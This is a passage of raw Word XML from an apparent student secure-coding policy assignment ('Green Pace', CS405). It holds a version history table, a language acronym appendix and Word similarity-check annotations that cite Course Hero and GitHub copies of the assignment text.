            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="46FBA2E2" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:r>
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="3EA48162" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:r>
              <w:t>08/05/2020</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3510" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="480458CE" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:r>
              <w:t>Initial Template</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1923" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="69CFA642" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:r>
              <w:t>David Buksbaum</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2077" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="5E2A207F" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00381847"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381847" w14:paraId="5B6F1353" w14:textId="77777777" w:rsidTr="00E54E9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1345" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="A5A5A5"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="A5A5A5"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="196A4ACC" w14:textId="7B01EFB7" w:rsidR="00381847" w:rsidRDefault="00D63645">
            <w:r>
              <w:t>2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="1DC436A6" w14:textId="3C793776" w:rsidR="00381847" w:rsidRDefault="001B0622">
            <w:r>
              <w:t>06/13/2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3510" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="0B713D2C" w14:textId="37250818" w:rsidR="00381847" w:rsidRDefault="001B0622">
            <w:r>
              <w:t>Project 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1923" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="124483AC" w14:textId="25C10852" w:rsidR="00381847" w:rsidRDefault="001B0622">
            <w:r>
              <w:t>Brian Engel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2077" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="697C2A49" w14:textId="2B03A65A" w:rsidR="00381847" w:rsidRDefault="00381847"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381847" w14:paraId="460BCB98" w14:textId="77777777" w:rsidTr="00E54E9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1345" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="4F454B11" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:r>
              <w:t>[Insert text.]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="305DA4F1" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:r>
              <w:t>[Insert text.]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3510" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="138D7C42" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:r>
              <w:t>[Insert text.]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1923" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="35E4A720" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:r>
              <w:t>[Insert text.]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2077" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="1FEC447A" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:r>
              <w:t>[Insert text.]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D8E66CD" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00381847"/>
    <w:p w14:paraId="6B0AA57B" w14:textId="0EB3CA4B" w:rsidR="00381847" w:rsidRDefault="00E769D9" w:rsidP="0059536C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc52464084"/>
      <w:r>
        <w:t>Appendix A Lookups</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w14:paraId="2264544C" w14:textId="77777777" w:rsidR="00171556" w:rsidRPr="00171556" w:rsidRDefault="00171556" w:rsidP="00171556"/>
    <w:p w14:paraId="127B45D0" w14:textId="7E02B229" w:rsidR="00381847" w:rsidRDefault="00E769D9" w:rsidP="0059536C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc52464085"/>
      <w:r>
        <w:t>Approved C/C++ Language Acronyms</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p w14:paraId="4879C4D5" w14:textId="77777777" w:rsidR="00171556" w:rsidRPr="00171556" w:rsidRDefault="00171556" w:rsidP="00171556"/>
    <w:tbl>
      <w:tblPr>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left w:w="115" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
        <w:tblDescription w:val="Table"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5192"/>
        <w:gridCol w:w="5193"/>
      </w:tblGrid>
      <w:tr w:rsidR="00381847" w14:paraId="3421D65D" w14:textId="77777777" w:rsidTr="00E54E9E">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>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rsidTr="00E54E9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5192" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="112977D2" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:r>
              <w:t>C++</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5193" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="7EE66078" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:r>
              <w:t>CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381847" w14:paraId="380D3980" w14:textId="77777777" w:rsidTr="00E54E9E">
        <w:tc>
          <w:tcPr>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shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="1F7DCC24" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:r>
              <w:t>CLG</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381847" w14:paraId="1234DFD6" w14:textId="77777777" w:rsidTr="00E54E9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5192" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="6E63B4B8" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:r>
              <w:t>Java</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5193" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="0218F327" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:r>
              <w:t>JAV</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="117BBEDB" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00381847"/>
    <w:sectPr w:rsidR="00381847">
      <w:headerReference w:type="default" r:id="rId158"/>
      <w:footerReference w:type="default" r:id="rId15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54AD6" w14:textId="77777777" w:rsidR="00496482" w:rsidRDefault="00496482">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3AF7BDC8" w14:textId="77777777" w:rsidR="00496482" w:rsidRDefault="00496482">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="0CA414C4" w14:textId="77777777" w:rsidR="00496482" w:rsidRDefault="00496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C507F" w14:textId="77777777" w:rsidR="00496482" w:rsidRDefault="00496482">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="731D6FDF" w14:textId="77777777" w:rsidR="00496482" w:rsidRDefault="00496482">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="4C591BEF" w14:textId="77777777" w:rsidR="00496482" w:rsidRDefault="00496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xmlns:oel="http://schemas.microsoft.com/office/2019/extlst">
  <int2:observations>
    <int2:bookmark int2:bookmarkName="_Int_pzcTHqwi" int2:invalidationBookmarkName="" int2:hashCode="abxPZtKosX8ymK" int2:id="xxAiNgnc">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Similarity_SimilarityAnnotation"/>
      <int2:extLst>
        <oel:ext uri="426473B9-03D8-482F-96C9-C2C85392BACA">
          <int2:similarityCritique int2:version="1" int2:context="This illustration provides a visual representation of the defense-in-depth best practice of layered security.">
            <int2:source int2:sourceType="Online" int2:sourceTitle="CS405 Project One.docx - Green Pace Developer: Security..." int2:sourceUrl="https://www.coursehero.com/file/119742529/CS405-Project-Onedocx/" int2:sourceSnippet="17 Defense-in-Depth Illustration This illustration provides a visual representation of the defense-in-depth best practice of layered security. Project One There are seven steps outlined below that align with the elements you will be graded on in the accompanying rubric. When you complete these steps, you will have finished the security policy. 1.">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>(“CS405 Project One.docx - Green Pace Developer: Security...”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>(“CS405 Project One.docx - Green Pace Developer: Security...”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>(“CS405 Project One.docx - Green Pace Developer: Security...”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;CS405 Project One.docx - Green Pace Developer: Security...&lt;/i&gt;, https://www.coursehero.com/file/119742529/CS405-Project-Onedocx/.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;CS405 Project One.docx - Green Pace Developer: Security...&lt;/i&gt;. (n.d.). Retrieved from https://www.coursehero.com/file/119742529/CS405-Project-Onedocx/</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">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Automation [Insert text.] [Insert text.]. [Insert text.] 14 Defense-in-Depth Illustration This illustration provides a visual representation of the defense-in-depth best practice of layered security. Project One: There are seven steps outlined below that align with the elements you will be graded on in the accompanying rubric.">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ource int2:sourceType="Online" int2:sourceTitle="I need help with a case study on security breaches The purpose of..." int2:sourceUrl="https://www.coursehero.com/tutors-problems/Information-Security/29801834-I-need-help-with-a-case-study-on-security-breaches-The-purpose-of-this/" int2:sourceSnippet="This illustration provides a visual representation of the defense-in-depth best practice of layered security. Outline. Introduction; Name of case and link; Date of case; Why did this case make the news? Describe the breach; Type of security or data breach or combination; Why was this company a target?">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>(“I need help with a case study on security breaches The purpose of...”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>(“I need help with a case study on security breaches The purpose of...”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>(“I need help with a case study on security breaches The purpose of...”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;I need help with a case study on security breaches The purpose of...&lt;/i&gt;, https://www.coursehero.com/tutors-problems/Information-Security/29801834-I-need-help-with-a-case-study-on-security-breaches-The-purpose-of-this/.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;I need help with a case study on security breaches The purpose of...&lt;/i&gt;. (n.d.). Retrieved from https://www.coursehero.com/tutors-problems/Information-Security/29801834-I-need-help-with-a-case-study-on-security-breaches-The-purpose-of-this/</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>“I need help with a case study on security breaches The purpose of...” n.d., https://www.coursehero.com/tutors-problems/Information-Security/29801834-I-need-help-with-a-case-study-on-security-breaches-The-purpose-of-this/.</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
            </int2:source>
          </int2:similarityCritique>
        </oel:ext>
      </int2:extLst>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_eoHrRuMz" int2:invalidationBookmarkName="" int2:hashCode="6RKMP9CcFEo6Y3" int2:id="2dgIkFcR">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Similarity_SimilarityAnnotation"/>
      <int2:extLst>
        <oel:ext uri="426473B9-03D8-482F-96C9-C2C85392BACA">
          <int2:similarityCritique int2:version="1" int2:context="*Use this checklist for the Triple A to be sure you include these elements in your policy:">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Use this checklist for the Triple A to be sure you include these elements in your policy. User logins Changes to the database 17 Addition of new users User level of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GjAd7KlB" int2:invalidationBookmarkName="" int2:hashCode="axDXHV306aARx5" int2:id="4lSIlDDJ">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25wkMzN5" int2:invalidationBookmarkName="" int2:hashCode="axDXHV306aARx5" int2:id="5dwJE9Sm">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v98MsnS2" int2:invalidationBookmarkName="" int2:hashCode="6Uaxs2t9/bUKea" int2:id="6anTikgW">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Similarity_SimilarityAnnotation"/>
      <int2:extLst>
        <oel:ext uri="426473B9-03D8-482F-96C9-C2C85392BACA">
          <int2:similarityCritique int2:version="1" int2:context="You completed one of these tables for each of your standards in the Module Three milestone. In Project One, add revisions to improve the explanation and examples as needed. Add rows to accommodate additional examples of compliant and noncompliant code.">
            <int2:source int2:sourceType="Online" int2:sourceTitle="GitHub - BrandonRicks/CS-405-Secure-Coding" int2:sourceUrl="https://github.com/BrandonRicks/CS-405-Secure-Coding" int2:sourceSnippe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You completed one of these tables for each of your standards in the Module Three milestone. In Project One, add revisions to improve the explanation and examples as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VRN6KkAs" int2:invalidationBookmarkName="" int2:hashCode="AYVRvhPMi0hB1l" int2:id="71BMk3PP">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Similarity_SimilarityAnnotation"/>
      <int2:extLst>
        <oel:ext uri="426473B9-03D8-482F-96C9-C2C85392BACA">
          <int2:similarityCritique int2:version="1" int2:contex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Automation will be used for the enforcement of and compliance to the standards defined in this policy. Green Pace already has a well-established DevOps process an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Qb9940BR" int2:invalidationBookmarkName="" int2:hashCode="hr/BeORaw/GVtV" int2:id="98M4jjr5">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Similarity_SimilarityAnnotation"/>
      <int2:extLst>
        <oel:ext uri="426473B9-03D8-482F-96C9-C2C85392BACA">
          <int2:similarityCritique int2:version="1" int2:context="Include all three types of encryption (in flight, at rest, and in use) and each of the three elements of the Triple-A framework using the tables provided.">
            <int2:source int2:sourceType="Online" int2:sourceTitle="CS 405-exception summary report 1.docx - Green Pace..." int2:sourceUrl="https://www.coursehero.com/file/100193701/CS-405-exception-summary-report-1docx/" int2:sourceSnippet="6. Create Policies for Encryption and Triple A Include all three types of encryption (in flight, at rest, and in use) and each of the three elements of the Triple-A framework using the tables provided. a. Explain each type of encryption, how it is used, and why and when the policy applies. b.">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ource int2:sourceType="Online" int2:sourceTitle="Risk assessment complete this section on the coding - Course Hero" int2:sourceUrl="https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/" int2:sourceSnippet="6. Create Policies for Encryption and Triple A Include all three types of encryption (in flight, at rest, and in use) and each of the three elements of the Triple-A framework using the tables provided. a. Explain each type of encryption, how it is used, and why and when the policy applies. b. Explain each type of Triple-A framework strategy, how it is used, and why and when the policy applies.">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>(“Risk assessment complete this section on the coding - Course Hero”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>(“Risk assessment complete this section on the coding - Course Hero”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>(“Risk assessment complete this section on the coding - Course Hero”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;Risk assessment complete this section on the coding - Course Hero&lt;/i&gt;, https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;Risk assessment complete this section on the coding - Course Hero&lt;/i&gt;. (n.d.). Retrieved from https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>“Risk assessment complete this section on the coding - Course Hero” n.d., https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/.</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
            </int2:source>
            <int2:source int2:sourceType="Online" int2:sourceTitle="GitHub - BrandonRicks/CS-405-Secure-Coding" int2:sourceUrl="https://github.com/BrandonRicks/CS-405-Secure-Coding" int2:sourceSnippet="Include all three types of encryption (in flight, at rest, and in use) and each of the three elements of the Triple-A framework using the tables provided**.** Explain each type of encryption, how it is used, and why and when the policy applies. Explain each type of Triple-A framework strategy, how it is used, and why and when the policy applies.">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imilarityCritique>
        </oel:ext>
      </int2:extLst>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_WXNLSENt" int2:invalidationBookmarkName="" int2:hashCode="alOw4w4uJbgcYM" int2:id="9dncxrrc">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Similarity_SimilarityAnnotation"/>
      <int2:extLst>
        <oel:ext uri="426473B9-03D8-482F-96C9-C2C85392BACA">
          <int2:similarityCritique int2:version="1" int2:context="This article explains the differences between policy, standards, principles, and practices (guidelines and procedure): Understanding the Hierarchy of Principles, Policies, Standards, Procedures, and Guidelines.">
            <int2:source int2:sourceType="Online" int2:sourceTitle="CS 405 Project 1.docx - Green Pace Developer: Security..." int2:sourceUrl="https://www.coursehero.com/file/98618758/CS-405-Project-1docx/" int2:sourceSnippet="This article explains the differences between policy, standards, principles, and practices (guidelines and procedure): Understanding the Hierarchy of Principles, Policies, Standards, Procedures, and Guidelines. Scope This document applies to all staff that create, deploy, or support custom software at Green Pace.">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>(“CS 405 Project 1.docx - Green Pace Developer: Security...”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>(“CS 405 Project 1.docx - Green Pace Developer: Security...”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>(“CS 405 Project 1.docx - Green Pace Developer: Security...”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;CS 405 Project 1.docx - Green Pace Developer: Security...&lt;/i&gt;, https://www.coursehero.com/file/98618758/CS-405-Project-1docx/.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;CS 405 Project 1.docx - Green Pace Developer: Security...&lt;/i&gt;. (n.d.). Retrieved from https://www.coursehero.com/file/98618758/CS-405-Project-1docx/</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>“CS 405 Project 1.docx - Green Pace Developer: Security...” n.d., https://www.coursehero.com/file/98618758/CS-405-Project-1docx/.</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
            </int2:source>
            <int2:source int2:sourceType="Online" int2:sourceTitle="CS 405 Project 1 - 2.docx - Green Pace Developer: Security..." int2:sourceUrl="https://www.coursehero.com/file/98618822/CS-405-Project-1-2docx/" int2:sourceSnippet="This article explains the differences between policy, standards, principles, and practices (guidelines and procedure): Understanding the Hierarchy of Principles, Policies, Standards, Procedures, and Guidelines. Scope This document applies to all staff that create, deploy, or support custom software at Green Pace.">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>(“CS 405 Project 1 - 2.docx - Green Pace Developer: Security...”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>(“CS 405 Project 1 - 2.docx - Green Pace Developer: Security...”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>(“CS 405 Project 1 - 2.docx - Green Pace Developer: Security...”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;CS 405 Project 1 - 2.docx - Green Pace Developer: Security...&lt;/i&gt;, https://www.coursehero.com/file/98618822/CS-405-Project-1-2docx/.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;CS 405 Project 1 - 2.docx - Green Pace Developer: Security...&lt;/i&gt;. (n.d.). Retrieved from https://www.coursehero.com/file/98618822/CS-405-Project-1-2docx/</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>“CS 405 Project 1 - 2.docx - Green Pace Developer: Security...” n.d., https://www.coursehero.com/file/98618822/CS-405-Project-1-2docx/.</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
            </int2:source>
            <int2:source int2:sourceType="Online" int2:sourceTitle="Green Pace Developer: Secure Coding Standards &amp; Principles - Course Hero" int2:sourceUrl="https://www.coursehero.com/file/230969420/CS-405-Security-Policy-Template-1docx/" int2:sourceSnippet="This article explains the differences between policy, standards, principles, and practices (guidelines and procedure): Understanding the Hierarchy of Principles, Policies, Standards, Procedures, and Guidelines. Scope This document applies to all staff that create, deploy, or support custom software at Green Pace.">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>(“Green Pace Developer: Secure Coding Standards &amp; Principles - Course Hero”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>(“Green Pace Developer: Secure Coding Standards &amp; Principles - Course Hero”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>(“Green Pace Developer: Secure Coding Standards &amp; Principles - Course Hero”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;Green Pace Developer: Secure Coding Standards &amp; Principles - Course Hero&lt;/i&gt;, https://www.coursehero.com/file/230969420/CS-405-Security-Policy-Template-1docx/.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;Green Pace Developer: Secure Coding Standards &amp; Principles - Course Hero&lt;/i&gt;. (n.d.). Retrieved from https://www.coursehero.com/file/230969420/CS-405-Security-Policy-Template-1docx/</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>“Green Pace Developer: Secure Coding Standards &amp; Principles - Course Hero” n.d., https://www.coursehero.com/file/230969420/CS-405-Security-Policy-Template-1docx/.</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
            </int2:source>
          </int2:similarityCritique>
        </oel:ext>
      </int2:extLst>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_83QwqFDB" int2:invalidationBookmarkName="" int2:hashCode="4NVN+jY/9X4eV/" int2:id="9tJtAN6x">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Similarity_SimilarityAnnotation"/>
      <int2:extLst>
        <oel:ext uri="426473B9-03D8-482F-96C9-C2C85392BACA">
          <int2:similarityCritique int2:version="1" int2:context="This policy will be automatically reviewed annually, no later than 365 days from the last revision date. Further, it will be reviewed in response to regulatory or compliance changes, and on demand as determined by the OCISO.">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This policy will be automatically reviewed annually, no later than 365 days from the last revision date. Further, it will be reviewed in response to regulatory or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wHkG857T" int2:invalidationBookmarkName="" int2:hashCode="acWDKvaJGrendS" int2:id="vPsmYlFR">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Similarity_SimilarityAnnotation"/>
      <int2:extLst>
        <oel:ext uri="426473B9-03D8-482F-96C9-C2C85392BACA">
          <int2:similarityCritique int2:version="1" int2:context="Approval for any exception must be granted by chief information officer (CIO) and the chief information security officer (CISO) or their appointed delegates of officer level.">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compliance Date for when the plan to come into compliance will be completed Approval for any exception must be granted by chief information officer (CIO) and the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HdfGCVQo" int2:invalidationBookmarkName="" int2:hashCode="axDXHV306aARx5" int2:id="BDuiMKOq">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4S9Yl0C0" int2:invalidationBookmarkName="" int2:hashCode="axDXHV306aARx5" int2:id="xFp0sPKi">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wkYPZahO" int2:invalidationBookmarkName="" int2:hashCode="drwTvU05oPavDk" int2:id="D4mFavhS">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Similarity_SimilarityAnnotation"/>
      <int2:extLst>
        <oel:ext uri="426473B9-03D8-482F-96C9-C2C85392BACA">
          <int2:similarityCritique int2:version="1" int2:context="The only item you must complete beyond this point is the Policy Version History table.">
